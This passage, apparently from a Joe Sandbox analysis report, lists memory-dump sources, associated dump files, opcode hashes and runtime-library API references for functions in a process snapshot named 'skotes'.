                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                • String ID: csm$csm$csm
                                                                                                                • API String ID: 4162181273-393685449
                                                                                                                • Opcode ID: eddc0219504d18c51e9b11eabaa38fae5d91a305ad299a655e183917c369c655
                                                                                                                • Instruction ID: 60be9eb9f2b8d30870a09d56a59cd727da6bacf3bfc4c823fa17d0b08779b502
                                                                                                                • Opcode Fuzzy Hash: eddc0219504d18c51e9b11eabaa38fae5d91a305ad299a655e183917c369c655
                                                                                                                • Instruction Fuzzy Hash: C2C17671800609EFCF25DFA4D884BEEBBB6BF18315F04415AF8056B202D779DA61CBA1
                                                                                                                APIs
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 007B4877
                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 007B487F
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 007B4908
                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 007B4933
                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 007B4988
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                • String ID: =L-t$S9{$csm
                                                                                                                • API String ID: 1170836740-4269351638
                                                                                                                • Opcode ID: 6506468e595e8c2bca49ec4fe70140e54e07660ca824484da5cc9eb3a83f898a
                                                                                                                • Instruction ID: bca36072fc9de476b5e836848e9715a131825a498a12e824e1af61c92a740ef0
                                                                                                                • Opcode Fuzzy Hash: 6506468e595e8c2bca49ec4fe70140e54e07660ca824484da5cc9eb3a83f898a
                                                                                                                • Instruction Fuzzy Hash: 0741D634A00258EFCF10DF68D889BDEBBB5BF45324F148155E8185B393D739AA12CB91
                                                                                                                APIs
                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00796ED1
                                                                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00796F22
                                                                                                                • std::_Rethrow_future_exception.LIBCPMT ref: 00796F32
                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00796FD5
                                                                                                                • __Mtx_unlock.LIBCPMT ref: 007970DB
                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00797116
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 1997747980-768041998
                                                                                                                • Opcode ID: 7fb75e1a8629d171114ea39e67fadc82753eeea45122b4b2979fa780528de1b5
                                                                                                                • Instruction ID: a54a6544a49d139ba75170f6bd2c6876fc9e3ec4d7456892ea93cc95887d32df
                                                                                                                • Opcode Fuzzy Hash: 7fb75e1a8629d171114ea39e67fadc82753eeea45122b4b2979fa780528de1b5
                                                                                                                • Instruction Fuzzy Hash: 97C1E171D04708DBDF25DFB4E949BAEBBF5AF44310F00452EE81697682EB39A904CB61
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __freea$__alloca_probe_16
                                                                                                                • String ID: =L-t$Z{,m{
                                                                                                                • API String ID: 3509577899-3218568333
                                                                                                                • Opcode ID: 2798c9b2de51ab84ef0c87288c477962b84cc9ab656523bd9b1e212ea9e0c075
                                                                                                                • Instruction ID: 8aecb23c907c5f8b45928fb226fb18e46dc1f7d10e48b21bf13f54f87d6fbc25
                                                                                                                • Opcode Fuzzy Hash: 2798c9b2de51ab84ef0c87288c477962b84cc9ab656523bd9b1e212ea9e0c075
                                                                                                                • Instruction Fuzzy Hash: F551C072600206ABEF31AE64DC55FFB3BA9EF84760F15012DFE05A7151EB78DC1086A0
                                                                                                                APIs
                                                                                                                • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 007A73B0
                                                                                                                • Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 007A73F2
                                                                                                                • Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 007A740E
                                                                                                                • Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 007A7419
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007A7440
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementstd::invalid_argument::invalid_argument
                                                                                                                • String ID: count$ppVirtualProcessorRoots
                                                                                                                • API String ID: 3897347962-3650809737
                                                                                                                • Opcode ID: 4fa878537c74c106f0ae4e99b5f0ed4ee32439f3360b4cc1fba791b846c2adf3
                                                                                                                • Instruction ID: 49d9141e62f14c805886ef9bf704b7134261c9c1c20e987c0ed5801ba9db83cb
                                                                                                                • Opcode Fuzzy Hash: 4fa878537c74c106f0ae4e99b5f0ed4ee32439f3360b4cc1fba791b846c2adf3
                                                                                                                • Instruction Fuzzy Hash: 41217474A00249EFCF18EF58D899AADBBB5FF8A350F544169E90597351DB38AE00CF90
                                                                                                                APIs
                                                                                                                • _SpinWait.LIBCONCRT ref: 0079EEBC
                                                                                                                • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0079EEC8
                                                                                                                • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0079EEE1
                                                                                                                • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0079EF0F
                                                                                                                • Concurrency::Context::Block.LIBCONCRT ref: 0079EF31
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
